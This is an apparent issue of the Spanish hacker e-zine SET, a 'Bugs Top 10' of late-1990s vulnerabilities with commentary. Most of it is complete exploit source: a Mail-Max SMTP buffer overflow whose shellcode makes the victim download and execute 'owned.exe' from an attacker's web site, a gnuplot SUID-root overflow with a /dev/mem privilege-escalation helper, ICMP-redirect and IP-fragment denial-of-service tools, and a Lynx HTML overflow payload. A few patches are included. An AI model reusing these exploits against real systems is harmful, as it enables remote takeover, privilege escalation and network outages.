SET 39 Call For Papers

¿Eres un hacker? Si deseas pasar a formar parte de la historia del hacking hispano, colabora con la próxima edición de SET 39 enviándonos un artículo. No esperes más, esta es tu oportunidad de demostrar lo que sabes. Ayúdanos a construir una revista de hackers para hackers. SET Staff

The Bugs Top 10

      2947

Autor: SET Staff
-[ 0x09 ]--------------------------------------------------------------------
-[ THE BUGS TOP 10 ]---------------------------------------------------------
-[ by SET Staff ]-----------------------------------------------------SET-19-


-( 0x01 )-
Para	 : Windows NT
Tema	 : Cuelgue total
Patch	 : XDDDD
Creditos : Ingenius - Mensaje enviado por Zaldivar

Descripcion y Notas:

-----Mensaje original-----
De: Ingenius N.N.

Bien paso a explicar
 
1 - Abra un ventata de dos
2 - Precione la tacla TAB hasta que desaparesca todo lo que halla en
la pantalla o hasta que haga ruido de que no da para mas.
3 - Precione la tecla Backspace hasta que cuelge si no cuelta despues
de un rato no cuelga y uds a tenido apretada la tecla Backspace,
sueltela y preciones la tecla ENTER y listo pantalla azul de aquellas
 
Esto lo probe con NT Workstation 4.0 con SP3, seguro que con Server
tiene que andar
 
Saludos 
 
Ingenius N.N.


-( 0x02 )-
Para	 : Mail-Max SMTP Server for Windows 95/98/NT
Tema	 : Acceso no autorizado
Patch	 : No Microsoft, No problem
Creditos : _mcp_

<++> set_019/exploits/mmax.c
#include <stdio.h>
#include <unistd.h>
#include <fcntl.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <arpa/inet.h>

/* Mail-Max Remote Exploit by _mcp_ <pw@nacs.net>
This program must be run under x86 Linux

Greets go out to: Morpheus, Killspree, Coolg, Dregvant, Vio,
Wrl, #finite, #win32asm and anyone I may have missed, you know
who you are :).

You can reach me on efnet.

No greets go out to etl.

*/

char code[] =
"\xEB\x45\xEB\x20\x5B\xFC\x33\xC9\xB1\x82\x8B\xF3\x80\x2B\x1"
"\x43\xE2\xFA\x8B\xFB\xE8\xE9\xFF\xFF\xFF\xE8\xE4\xFF\xFF\xFF"
"\xEB\x29\x46\x58\xFF\xE0\xBB\x40\xA5\x1\x10\x56\xFF\x13\x8B"
"\xE8\x46\x33\xC0\x3A\x6\x75\xF9\x46\x40\x3A\x6\x74\xE5\x56"
"\x55\xBB\x54\xA5\x1\x10\xFF\x13\xAB\xEB\xE7\xEB\x4F\x33\xC9"
"\x66\x49\xC1\xC1\x2\x51\x33\xC0\x51\x50\xFF\x57\xE8\x8B\xE8"
"\x33\xC9\x51\x51\x51\x51\x57\xFF\x57\xF4\x33\xC9\x51\x51\x51"
"\x51\x56\x50\xFF\x57\xF8\x59\x57\x51\x55\x50\xFF\x57\xFC\x83"
"\xC6\x7\x33\xC9\x51\x56\xFF\x57\xDC\xFF\x37\x55\x50\x8B\xE8"
"\xFF\x57\xE0\x55\xFF\x57\xE4\x33\xC9\x51\x56\xFF\x57\xEC\xFF"
"\x57\xF0\xE8\x67\xFF\xFF\xFF\x4C\x46\x53\x4F\x46\x4D\x34\x33"
"\x1\x60\x6D\x64\x73\x66\x62\x75\x1\x60\x6D\x78\x73\x6A\x75"
"\x66\x1\x60\x6D\x64\x6D\x70\x74\x66\x1\x48\x6D\x70\x63\x62"
"\x6D\x42\x6D\x6D\x70\x64\x1\x58\x6A\x6F\x46\x79\x66\x64\x1"
"\x46\x79\x6A\x75\x51\x73\x70\x64\x66\x74\x74\x1\x2\x58\x4A"
"\x4F\x4A\x4F\x46\x55\x1\x4A\x6F\x75\x66\x73\x6F\x66\x75\x50"
"\x71\x66\x6F\x42\x1\x4A\x6F\x75\x66\x73\x6F\x66\x75\x50\x71"
"\x66\x6F\x56\x73\x6D\x42\x1\x4A\x6F\x75\x66\x73\x6F\x66\x75"
"\x53\x66\x62\x65\x47\x6A\x6D\x66\x1\x2\x69\x75\x75\x71\x3B"
"\x30\x30\x00";

    /*This is the encrypted /~pw/owned.exe we paste at the end */
char dir[] = "\x30\x7f\x71\x78\x30\x70\x78\x6f\x66\x65\x2F\x66\x79\x66\x1\x0";


unsigned int getip(char *hostname)
  {
  struct hostent *hostinfo;
  unsigned int binip;

  hostinfo = gethostbyname(hostname);

  if(!hostinfo)
    {
      printf("cant find: %s\n",hostname);
      exit(0);
    }
  bcopy(hostinfo -> h_addr, (char  *)&binip, hostinfo -> h_length);
  return(binip);
  }


int usages(char *fname)
{						
      printf("Remote Mail-Max exploit v1.0 by _mcp_ <pw@nacs.net>.\n");
      printf("Usages: \n");
      printf("%s <target host> <http site> <offset> <return address>\n",
fname);
      printf("All known versions offset = 539, Return address = 79887315\n");
      printf("Will make target download, save, and execute http://<http site>/~pw/owned.exe\n");

exit(0);

}


main (int argc, char *argv[])
{
  int sock,filedesc,offset,targethost,sinlen,codelength;
  struct sockaddr_in sin;
  unsigned char buffer[8000];
  char ipbuffer[16];
  unsigned char *ptr,*ptr2;
  unsigned long ret_addr;
  int len,x = 1;
  unsigned long address;

  if (argc < 5) usages(argv[0]);

  targethost = getip(argv[1]);


   len = strlen(argv[2]);
    if (len > 60)
     {
       printf("Bad http format!\n");
       usages(argv[0]);
     }

   ptr = argv[2];
   while (x <= len)
      {
        x++;
        (*ptr)++;           /*Encrypt the http ip for later parsing */
        ptr++;
      }

  offset = atoi(argv[3]);
  ret_addr = atol(argv[4]);

  if (offset > 7000)
     {

       printf("Offset too large.\n");
       exit(0);
     }

  sock = socket(AF_INET,SOCK_STREAM,0);

  sin.sin_family = AF_INET;
  sin.sin_addr.s_addr = targethost;
  sin.sin_port = htons(25);
  sinlen = sizeof(sin);


  printf("Starting to create the egg\n");
  ptr = (char *)&buffer;
  strcpy(ptr,"HELO ");
  ptr+=5;

  memset((void *)ptr, 0x90, 7000);

  ptr+=offset;
  memcpy ((void *) ptr,(void *)&ret_addr, 4);
  ptr+=60;
  memcpy((void *) ptr,(void *)&code,strlen(code));


  (char *) ptr2 = strstr(ptr,"\xb1");
  if (ptr2 == NULL)
     {
       printf("Bad shell code\n");
       exit(0);
     }
  ptr2++;
  (*ptr2)+= len + ( sizeof(dir) - 1 );

   (char *) ptr2 = strstr(ptr,"\x83\xc6");
     if (ptr2 == NULL)
      {
        printf("Bad shell code\n");
        exit(0);

      }

  ptr2+= 2;

  (*ptr2)+= len + 8;

  ptr+=strlen(code);
  memcpy((void *) ptr, (void *) argv[2], len);   /*Parse in the http
  site's info */
  ptr+=len;
  memcpy((void *) ptr,(void*) &dir, sizeof(dir) );
  printf("Made the egg\n");

    if ( connect(sock, (struct sockaddr *)&sin, sinlen) == -1)
     {
       perror("error:");
       exit(0);
     }
    printf("Connected.\n");

    write(sock, &buffer, strlen((char *)&buffer) );
    write(sock,"\r\n",2);
    sleep(1);
    printf("Sent the egg\n");
   close(sock);
   exit(1);
}
<-->

Descripcion y Notas:

Volvemos a las historias de siempre, a los desbordamientos. Parece que
los programadores no aprenden nunca, e incluso cada dia llegan a cometer
errores aun mas grandes.

No es que a ningun programador no se le pueda colar un desbordamiento en
su programa. Esto es habitual, sobre todo si se trabaja en C y se tiene
poca experiencia.

El problema surge en situaciones como la que tiene Mail-Max. Resulta que
no solo produce un desbordamiento, sino que ademas, ese codigo que
incluyamos por encima de la pila puede ser ejecutable, pues segun unas
determinadas circunstancias, este codigo se ejecutara. Ver para creer.


-( 0x03 )-
Para	 : Frontapge 98 & Apache 1.3.4
Tema	 : Tonteria
Patch	 : Si es que frontpage...
Creditos : Sitzkrieg Redundus

Descripcion y Notas:

Un error de los tontos. Aparentemente no se le saca provecho, pero es una
curiosidad que merece la pena comentar.

Resulta que al configurar el Apache 1.3.4 para que soporte las extensiones
de FrontPage 98, y lanzar el httpd, se produce un error de lo mas curioso.

El error proporcionado es ni mas ni menos que un error de sintaxis en la
linea 1 del fichero /dev/null.

Ya veis, ahora le da por jugar con los dispositivos, y no contento con eso,
crea un /dev/null.bak... Alucinante.


-( 0x04 )-
Para	 : GNU Plot 3.5
Tema	 : SUID root
Patch	 : quizas mas abajo
Creditos : xnec / Nergal

<++> set_019/exploits/xnec_plot.c
/*
gnuplot Linux x86 exploit from xnec
tested on gnuplot Linux version 3.5 (pre 3.6) patchlevel beta 336/SuSE 5.2
gnuplot ships suidroot by default in SuSE 5.2, maybe others

gcc -o xnec_plot xnec_plot.c
./xnec_plot <bufsiz> <offset>

The buffer we're overflowing is only 80 bytes, so we're going to have to
get our settings just so.  If you don't feel like typing in command line
offsets and bufsizes, make a little shell script:
---
#! /bin/bash
bufsiz=110
offset=0

while [ $offset -lt 500 ]; do
  ./xnec_plot $bufsiz $offset
  offset=`expr $offset + 10`
done
---
since gnuplot drops root privs after it inits your svga, we can't just exec
/bin/sh, we'll need to use the technique of replacing our saved uid
in /dev/mem with '0', then execing whatever we please.  We do this by compiling
Nergal's program, mem.c and putting the output file in /tmp/xp, as in
gcc -o /tmp/xp mem.c.  Nergal's program will then make /tmp/sh suidroot,
so don't forget to cp /bin/sh /tmp/sh.  You will also have to change
line 32 to the correct address of kstat, which can be obtained by doing
strings /proc/ksyms | grep kstat.

Since I can see absolutely no reason for gnuplot to be suidroot, the best
fix is chmod -s /usr/bin/gnuplot.

greets to #sk1llz, xnec on EFnet and DALnet

*/

#include <stdlib.h>

#define DEFAULT_OFFSET 50
#define DEFAULT_BUFSIZ 110
#define NOP 0x90
#define DEFAULT_ADDR 0xbffff81c

/* Aleph One's shellcode, modified to run our own program */
char shellcode[] =
  "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
  "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
  "\x80\xe8\xdc\xff\xff\xff/tmp/xp";

unsigned long getsp(void) {
   __asm__("movl %esp,%eax");
}


void main(int argc, char *argv[]) {
  char *buf, *ret;
  long *addrp, addr;
  int bufsiz, offset;
  int i;

  bufsiz=DEFAULT_BUFSIZ;
  offset=DEFAULT_OFFSET;

  if (argc = 2) bufsiz  = atoi(argv[1]);
  if (argc = 3) offset = atoi(argv[2]);

  buf=malloc(bufsiz);
  addr = getsp() - offset;

  printf("address: 0x%x\n", addr);
  printf("bufsize: %d\n", bufsiz);
  printf("offset : %d\n", offset);

  ret = buf;
  addrp = (long *) ret;
  for (i = 0; i < bufsiz; i+=4)
    *(addrp++) = addr;

  memset(buf, NOP, (strlen(shellcode)/2));

  ret = buf + ((bufsiz/2) - (strlen(shellcode)/2));
  for (i = 0; i < strlen(shellcode); i++)
    *(ret++) = shellcode[i];

  buf[bufsiz - 1] = '\0';

  memcpy(buf,"HOME=", 5);
  setenv("HOME", buf, 1);
  execvp("/usr/bin/gnuplot", NULL);
}
<-->

<++> set_019/exploits/mem.c
/* by Nergal */
#define SEEK_SET 0

#define __KERNEL__
#include <linux/sched.h>
#undef __KERNEL__

#define SIZEOF sizeof(struct task_struct)

int mem_fd;
int mypid;

void
testtask (unsigned int mem_offset)
{
  struct task_struct some_task;
  int uid, pid;
  lseek (mem_fd, mem_offset, SEEK_SET);
  read (mem_fd, &some_task, SIZEOF);
  if (some_task.pid == mypid)   /* is it our task_struct ? */
    {
      some_task.euid = 0;
      some_task.fsuid = 0;      /* needed for chown */
      lseek (mem_fd, mem_offset, SEEK_SET);
      write (mem_fd, &some_task, SIZEOF);
      /* from now on, there is no law beyond do what thou wilt */
      chown ("/tmp/sh", 0, 0);
      chmod ("/tmp/sh", 04755);
      exit (0);
    }
}
#define KSTAT 0x001a8fb8  /*  <-- replace this addr with that of your kstat */
main ()                   /*      by doing strings /proc/ksyms |grep kstat  */
{
  unsigned int i;
  struct task_struct *task[NR_TASKS];
  unsigned int task_addr = KSTAT - NR_TASKS * 4;
  mem_fd = 3;                   /* presumed to be opened /dev/mem */
  mypid = getpid ();
  lseek (mem_fd, task_addr, SEEK_SET);
  read (mem_fd, task, NR_TASKS * 4);
  for (i = 0; i < NR_TASKS; i++)
    if (task[i])
      testtask ((unsigned int)(task[i]));

}
<-->

<++> set_019/patches/gnuplot
--- plot.c.old  Fri Mar  5 03:17:59 1999
+++ plot.c      Fri Mar  5 03:29:19 1999
@@ -516,7 +516,7 @@
     char c='\0';/* character that should be added, or \0, if none */

     if(tmp_home) {
-       strcpy(home,tmp_home);
+       strncpy(home,tmp_home,(sizeof(home) - 1));
        if( strlen(home) ) p = &home[strlen(home)-1];
        else               p = home;
 #if defined(MSDOS) || defined(ATARI) || defined( OS2 ) || defined(_Windows) ||
defined(DOS386)
<-->

Descripcion y Notas:

El error es un simple buffer overflow, de los de toda la vida. El problema
surge cuando el programa se instala con SUID root por defecto, en
distribuciones como la SuSe 5.2, por ejemplo.

En estas circunstancias, despues de producirse el desbordamiento, se
obtienen permisos de root. Toda una ganga que podemos evitar con el
patch suministrado ;)

Es conveniente comprobarlo, pues en distribuciones como Slackware o Debian parece que se instala correctamente, evitando el problema mencionado.

Otra forma de solventar el problema en SuSe, que al parecer se trata de la
unica distribucion afectada (eso si, en una version antigua), es modificar
el fichero /etc/rc.config, de forma que la variable PERMISSION_SECURITY se
establezca en "paranoid".


-( 0x05 )-
Para	 : Windows {95,98,NT}
Tema	 : Congelar el sistema operativo
Patch	 : Es bueno y es gratis... es... LINUX
Creditos : Delmore

<++> set_019/exploits/winfreez.c
/*
 WinFreez.c by Delmore <delmore@moscowmail.com>

 ICMP/Redirect-host message storm freeze Win9x/NT(sp4) box
 in LAN.

 Usage: winfreez sendtoip sendfromip time
 where <sendtoip> is victim host, <sendfromip> is router
 for victim host, <time> is time in seconds to freeze victim.

 Note:
 I've written small exploit for freeze win9x/nt boxes in LAN.
 Proggy initiates ICMP/Redirect-host messages storm from router
 (use router ip). Windows will receive redirect-host messages
 and change own route table, therefore it will be frozen
 or slowly working during this time.

 On victim machine route table changes viewing with:
 ROUTE PRINT
 command in ms-dos box.

 Exploit show different result for different system configuration.

 System results:

 p200/16ram/win95osr2 is slowly execute application
 after 20 seconds of storm.

 p233/96ram/nt4-sp4 is slowly working after 30
 seconds of storm.

 p2-266/64ram/win95 working slowly and can't normal execute
 application.


 Compiled on RedHat Linux 5, Kernel 2.0.35 (x86)
 gcc ./winfreez.c -o winfreez

 --- for Slackware Linux, Kernel 2.0.30
 If you can't compile due to ip_sum not defined errors,
 replace (line 207):
  ip->ip_sum = 0;
 to line:
  ip->ip_csum = 0;
 ---

 Soldiers Of Satan group
 Russia, Moscow State University, 05 march 1999
 http://sos.nanko.ru

 Thanx to Mark Henderson.

 */

#include <stdio.h>
#include <stdlib.h>
#include <time.h>
#include <string.h>

#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>

/*
 * Structure of an icmp header (from sparc header).
 */

struct icmp {
 u_char icmp_type; /* type of message, see below */
 u_char icmp_code; /* type sub code */
 u_short icmp_cksum; /* ones complement cksum of struct */

union {
 u_char ih_pptr; /* ICMP_PARAMPROB */
 struct in_addr ih_gwaddr; /* ICMP_REDIRECT */
 struct ih_idseq {
 n_short icd_id;
 n_short icd_seq;
} ih_idseq;

int ih_void;
} icmp_hun;

#define icmp_pptr icmp_hun.ih_pptr
#define icmp_gwaddr icmp_hun.ih_gwaddr
#define icmp_id icmp_hun.ih_idseq.icd_id
#define icmp_seq icmp_hun.ih_idseq.icd_seq
#define icmp_void icmp_hun.ih_void

union {
 struct id_ts {
 n_time its_otime;
 n_time its_rtime;
 n_time its_ttime;
} id_ts;

struct id_ip  {
struct ip idi_ip;
/* options and then 64 bits of data */
} id_ip;

u_long id_mask;
char id_data[1];
} icmp_dun;

#define icmp_otime icmp_dun.id_ts.its_otime
#define icmp_rtime icmp_dun.id_ts.its_rtime
#define icmp_ttime icmp_dun.id_ts.its_ttime
#define icmp_ip icmp_dun.id_ip.idi_ip
#define icmp_mask icmp_dun.id_mask
#define icmp_data icmp_dun.id_data

};


u_short in_cksum (u_short *addr, int len);
void attack( char *sendtoip, char *sendfromip, time_t wtime, int s );


void main (int argc, char **argv)
{
  time_t wtime;
  char *sendtoip, *sendfromip;
  int s, on;

  if (argc != 4)
    {
      fprintf (stderr, "usage: %s sendto sendfrom time\n", argv[0]);
      exit (1);
    }

  sendtoip = (char *)malloc(strlen(argv[1]) + 1);
  strcpy(sendtoip, argv[1]);

  sendfromip = (char *)malloc(strlen(argv[2]) + 1);
  strcpy(sendfromip, argv[2]);

  wtime = atol(argv[3]);

  if ((s = socket (AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0)
    {
      fprintf (stderr, "socket creation error\n" );
      exit (1);
    }

#ifdef IP_HDRINCL
  if (setsockopt (s, IPPROTO_IP, IP_HDRINCL, &on, sizeof (on)) < 0)
    {
      fprintf (stderr, "sockopt IP_HDRINCL error\n" );
      exit (1);
    }
#endif

  printf("winfreez by Delmore, <delmore@moscowmail.com>\n");
  printf("Soldiers Of Satan group, http://sos.nanko.ru\n\n");
  printf("sendto = %s\n", sendtoip);
  printf("sendfrom = %s\n", sendfromip);
  printf("time = %i s\n", wtime);

  attack( sendtoip, sendfromip, wtime, s );

  free( (void *) sendtoip );
  free( (void *) sendfromip );
}


void attack( char *sendtoip, char *sendfromip, time_t wtime, int s )
{
  time_t curtime, endtime;
  int i1, i2, i3, i4;
  char redir[21];
  char buf[100];
  struct ip *ip = (struct ip *) buf;
  struct icmp *icmp = (struct icmp *) (ip + 1);
  struct hostent *hp;
  struct sockaddr_in dst;

  if(wtime==0) return;

  if ((hp = gethostbyname (sendtoip)) == NULL)
   if ((ip->ip_dst.s_addr = inet_addr (sendtoip)) == -1)
     {
      fprintf (stderr, "%s: unknown sendto\n", sendtoip);
      exit (1);
     }

  if ((hp = gethostbyname (sendfromip)) == NULL)
   if ((ip->ip_src.s_addr = inet_addr (sendfromip)) == -1)
     {
      fprintf (stderr, "%s: unknown sendfrom\n", sendfromip);
      exit (1);
     }

  endtime = time(NULL) + wtime;

  srand((unsigned int) endtime);

 do {
  bzero (buf, sizeof buf);

  /* sendto/gateway */
  hp = gethostbyname (sendtoip);
  bcopy (hp->h_addr_list[0], &ip->ip_dst.s_addr, hp->h_length);
  bcopy (hp->h_addr_list[0], &icmp->icmp_gwaddr.s_addr, hp->h_length);

  /* sendfrom */
  hp = gethostbyname (sendfromip);
  bcopy (hp->h_addr_list[0], &ip->ip_src.s_addr, hp->h_length);

  /* generate redirect*/
  i1 = 1+(int) (223.0*rand()/(RAND_MAX+1.0));
  i2 = 1+(int) (253.0*rand()/(RAND_MAX+1.0));
  i3 = 1+(int) (253.0*rand()/(RAND_MAX+1.0));
  i4 = 1+(int) (253.0*rand()/(RAND_MAX+1.0));

  bzero (redir, sizeof redir);
  sprintf(redir,"%u.%u.%u.%u", i4, i3, i2, i1 );

  hp = gethostbyname (redir);
  bcopy (hp->h_addr_list[0], &icmp->icmp_ip.ip_dst.s_addr, hp->h_length);

  ip->ip_v = 4;
  ip->ip_hl = sizeof *ip >> 2;
  ip->ip_tos = 0;
  ip->ip_len = htons (sizeof buf);
  ip->ip_id = htons (4321);
  ip->ip_off = 0;
  ip->ip_ttl = 255;
  ip->ip_p = 1;
  ip->ip_sum = 0;               /* kernel fills this in */

  bcopy (&ip->ip_dst.s_addr, &icmp->icmp_ip.ip_src.s_addr, sizeof
(ip->ip_dst.s_addr));
  icmp->icmp_ip.ip_v = 4;
  icmp->icmp_ip.ip_hl = sizeof *ip >> 2;
  icmp->icmp_ip.ip_tos = 0;
  icmp->icmp_ip.ip_len = htons (100);   /* doesn't matter much */
  icmp->icmp_ip.ip_id = htons (3722);
  icmp->icmp_ip.ip_off = 0;
  icmp->icmp_ip.ip_ttl = 254;
  icmp->icmp_ip.ip_p = 1;
  icmp->icmp_ip.ip_sum = in_cksum ((u_short *) & icmp->icmp_ip, sizeof *ip);

  dst.sin_addr = ip->ip_dst;
  dst.sin_family = AF_INET;

  icmp->icmp_type = ICMP_REDIRECT;
  icmp->icmp_code = 1; /* 1 - redirect host, 0 - redirect net */
  icmp->icmp_cksum = in_cksum ((u_short *) icmp, sizeof (buf) - sizeof
(*ip));

  if( sendto( s, buf, sizeof buf, 0, (struct sockaddr *) &dst, sizeof dst) <
0 )
    {
      fprintf (stderr, "sendto error\n");
      exit (1);
    }

  }while (time(NULL)!=endtime);
}

/*
 * in_cksum -- Checksum routine for Internet Protocol family headers (C
 * Version) - code from 4.4 BSD
 */
u_short in_cksum (u_short *addr, int len)
{
  register int nleft = len;
  register u_short *w = addr;
  register int sum = 0;
  u_short answer = 0;

  /*
   * Our algorithm is simple, using a 32 bit accumulator (sum), we add
   * sequential 16 bit words to it, and at the end, fold back all the
   * carry bits from the top 16 bits into the lower 16 bits.
   */
  while (nleft > 1)
    {
      sum += *w++;
      nleft -= 2;
    }

  /* mop up an odd byte, if necessary */
  if (nleft == 1)
    {
      *(u_char *) (&answer) = *(u_char *) w;
      sum += answer;
    }
  /* add back carry outs from top 16 bits to low 16 bits */
  sum = (sum >> 16) + (sum & 0xffff);   /* add hi 16 to low 16 */
  sum += (sum >> 16);           /* add carry */
  answer = ~sum;                /* truncate to 16 bits */
  return (answer);
}
<-->

Descripcion y Notas:

No, no se trata de mantener bien conservado y fresco a Windows para que
llegue con salud al a~o 2.000.

Bien, para que esto funcione, la maquina con Windows debe estar conectada
a una LAN.

El programa envia una rafaga de paquetes ICMP redirect-host (tipo 5,
codigo 1). Windows, al recibir estos paquetes, cambia su tabla de
enrutamiento, quedandose parcial o totalmente congelado durante este proceso.

En algunas ocasiones tarda un poco en mostrar resultados, pero funciona
perfectamente, incluso con el ultimo Service Pack (el 4), para Windows NT.

Una ultima aclaracion. Las direcciones suministradas por los paquetes
ICMP redirect-host son aleatorias, siendo esta parte de la causa del
efecto.


-( 0x06 )-
Para	 : Lynx 2.8
Tema	 : Overflow
Patch	 : Una version mas reciente, o un telnet directamente
Creditos : Este lo envio... Mixter

Descripcion y Notas:

Pues como siempre, se olvidaron los programadores de comprobar que una
variable no execediese de tama~o, en la funcion strrchr()

Una forma de explotarlo es con el siguiente codigo HTML:

<img
width=00000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000001>
FAILED<br><br>

Y al parecer, tambien cuela en el Internet Explorer. Esto es compenetracion.


-( 0x07 )-
Para	 : Linux 2.1.89 & 2.2.3
Tema	 : Perdida de la conectividad IP
Patch	 : Mas abajo, o un nuevo kernel
Creditos : John McDonald

<++> set_019/exploits/sesquipedalian.c
/*
 * sesquipedalian.c - Demonstrates a DoS bug in Linux 2.1.89 - 2.2.3
 *
 * by horizon <jmcdonal@unf.edu>
 *
 * This sends a series of IP fragments such that a 0 length fragment is first
 * in the fragment list. This causes a reference count on the cached routing
 * information for that packet's originator to be incremented one extra time.
 * This makes it impossible for the kernel to deallocate the destination entry
 * and remove it from the cache.
 *
 * If we send enough fragments such that there are at least 4096 stranded
 * dst cache entries, then the target machine will no longer be able to
 * allocate new cache entries, and IP communication will be effectively
 * disabled. You will need to set the delay such that packets are not being
 * dropped, and you will probably need to let the program run for a few
 * minutes to have the full effect. This was written for OpenBSD and Linux.
 *
 * Thanks to vacuum, colonwq, duke, rclocal, sygma, and antilove for testing.
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <netdb.h>
#include <arpa/inet.h>

struct my_ip_header
{
	unsigned char  ip_hl:4,         /* header length */
		ip_v:4;               /* version */
	unsigned char  ip_tos;          /* type of service */
	unsigned short ip_len;          /* total length */
	unsigned short ip_id;           /* identification */
	unsigned short ip_off;          /* fragment offset field */
#define IP_RF 0x8000                    /* reserved fragment flag */
#define IP_DF 0x4000                    /* dont fragment flag */
#define IP_MF 0x2000                    /* more fragments flag */
#define IP_OFFMASK 0x1fff               /* mask for fragmenting bits */
	unsigned char  ip_ttl;          /* time to live */
	unsigned char  ip_p;                    /* protocol */
	unsigned short ip_sum;          /* checksum */
	unsigned long ip_src, ip_dst; /* source and dest address */
};

struct my_udp_header
{
	unsigned short uh_sport;
	unsigned short uh_dport;
	unsigned short uh_ulen;
	unsigned short uh_sum;
};

#define IHLEN (sizeof (struct my_ip_header))
#define UHLEN (sizeof (struct my_udp_header))

#ifdef __OpenBSD__
#define EXTRA 8
#else
#define EXTRA 0
#endif

unsigned short checksum(unsigned short *data,unsigned short length)
{
        register long value;
        u_short i;

        for(i=0;i<(length>>1);i++)
                value+=data[i];

        if((length&1)==1)
                value+=(data[i]<<8);

        value=(value&65535)+(value>>16);

        return(~value);
}

unsigned long resolve( char *hostname)
{
	long result;
	struct hostent *hp;

	if ((result=inet_addr(hostname))==-1)
	{
		if ((hp=gethostbyname(hostname))==0)
		{
			fprintf(stderr,"Can't resolve target.\n");
			exit(1);
		}
		bcopy(hp->h_addr,&result,4);
	}
	return result;
}

void usage(void)
{
	fprintf(stderr,"usage: ./sqpd [-s sport] [-d dport] [-n count] [-u delay] source target\n");
	exit(0);
}


void sendem(int s, unsigned long source, unsigned long dest,
		unsigned short sport, unsigned short dport)
{
	static char buffer[8192];
	struct my_ip_header *ip;
	struct my_udp_header *udp;
	struct sockaddr_in sa;

	bzero(&sa,sizeof(struct sockaddr_in));
	sa.sin_family=AF_INET;
	sa.sin_port=htons(sport);
	sa.sin_addr.s_addr=dest;

	bzero(buffer,IHLEN+32);
	
	ip=(struct my_ip_header *)buffer;
	udp=(struct my_udp_header *)&(buffer[IHLEN]);

	ip->ip_v = 4;
	ip->ip_hl = IHLEN >>2;
	ip->ip_tos = 0;
	ip->ip_id = htons(random() & 0xFFFF);
	ip->ip_ttl = 142;
	ip->ip_p = IPPROTO_UDP;
	ip->ip_src = source;
	ip->ip_dst = dest;
	udp->uh_sport = htons(sport);
	udp->uh_dport = htons(dport);
	udp->uh_ulen = htons(64-UHLEN);
	udp->uh_sum = 0;

	/* Our first fragment will have an offset of 0, and be 32 bytes
	   long. This gets added as the only element in the fragment
	   list. */

	ip->ip_len = htons(IHLEN+32);
	ip->ip_off = htons(IP_MF);
	ip->ip_sum = 0;
	ip->ip_sum = checksum((u_short *)buffer,IHLEN+32);

	if (sendto(s,buffer,IHLEN+32,0,(struct sockaddr*)&sa,sizeof(sa)) < 0)
	{
		perror("sendto");
		exit(1);
	}

	/* Our second fragment will have an offset of 0, and a 0 length.
	   This gets added to the list before our previous fragment,
	   making it first in line. */

	ip->ip_len = htons(IHLEN);
	ip->ip_off = htons(IP_MF);
	ip->ip_sum = 0;
	ip->ip_sum = checksum((u_short *)buffer,IHLEN);

	if (sendto(s,buffer,IHLEN+EXTRA,0,(struct sockaddr*)&sa,sizeof(sa)) < 0)
	{
		perror("sendto");
		exit(1);
	}

	/* Our third and final frag has an offset of 4 (32 bytes), and a
	   length of 32 bytes. This passes our three frags up to ip_glue. */

	ip->ip_len = htons(IHLEN+32);
	ip->ip_off = htons(32/8);
	ip->ip_sum = 0;
	ip->ip_sum = checksum((u_short *)buffer,IHLEN+32);

	if (sendto(s,buffer,IHLEN+32,0,(struct sockaddr*)&sa,sizeof(sa)) < 0)
	{
		perror("sendto");
		exit(1);
	}
}

int main(int argc, char **argv)
{
	int sock;
	int on=1,i;
	unsigned long source, dest;
	unsigned short sport=53, dport=16384;
	int delay=20000, count=15000;

	if (argc<3)
		usage();	

	while ((i=getopt(argc,argv,"s:d:n:u:"))!=-1)
	{
		switch (i)
		{
			case 's': sport=atoi(optarg);
				  break;
			case 'd': dport=atoi(optarg);
				  break;
			case 'n': count=atoi(optarg);
				  break;
			case 'u': delay=atoi(optarg);
				  break;
			default:  usage();
		}
	}
	
	argc-=optind;
	argv+=optind;

	source=resolve(argv[0]);
        dest=resolve(argv[1]);

	srandom(time((time_t)0)*getpid());

	if( (sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0)
	{
		perror("socket");
		exit(1);
	}

	if (setsockopt(sock,IPPROTO_IP,IP_HDRINCL,(char *)&on,sizeof(on)) < 0)
	{
		perror("setsockopt: IP_HDRINCL");
		exit(1);
	}

	fprintf(stdout,"\nStarting attack on %s ...",argv[1]);

	for (i=0; i<count; i++)
	{
		sendem(sock,source+htonl(i),dest,sport,dport);
		if (!(i%2))
			usleep(delay);
		if (!(i%100))
		{
			if (!(i%2000))
				fprintf(stdout,"\n");
			fprintf(stdout,".");
			fflush(stdout);
		}
	}

	fprintf(stdout,"\nDone.\n");
	exit(1);
}
<-->

<++> set_019/patches/sesquipedalian
--- linux-2.2.3/net/ipv4/ip_fragment.c  Wed Mar 24 22:48:26 1999
+++ linux/net/ipv4/ip_fragment.c        Wed Mar 24 22:44:24 1999
@@ -17,6 +17,7 @@
  *             xxxx            :       Overlapfrag bug.
  *             Ultima          :       ip_expire() kernel panic.
  *             Bill Hawes      :       Frag accounting and evictor fixes.
+ *             John McDonald   :       0 length frag bug.
  */

 #include <linux/types.h>
@@ -357,7 +358,7 @@
        fp = qp->fragments;
        count = qp->ihlen;
        while(fp) {
-               if ((fp->len < 0) || ((count + fp->len) > skb->len))
+               if ((fp->len <= 0) || ((count + fp->len) > skb->len))
                        goto out_invalid;
                memcpy((ptr + fp->offset), fp->ptr, fp->len);
                if (count == qp->ihlen) {
<-->

Descripcion y Notas:

En esta ocasion nos encontramos con un error en el tratamiento de los
datagramas IP.

Que es lo que sucede? Pues que cuando se tiene que gestionar un fragmento
de longitud 0, y da la casualidad de que este fragmento es el primero,
generaremos una cantidad de basura en la memoria que no sera eliminada,
siendo esta nuestra puerta a bloquear la conectividad de la maquina


-( 0x08 )-
Para	 : X11R6 - BSD
Tema	 : Acceso root en ciertas condiciones
Patch	 : Uhmm!
Creditos : telnetd

Descripcion y Notas:

Bien la historia se produce por un error con la gestion de permisos del
X11R6.

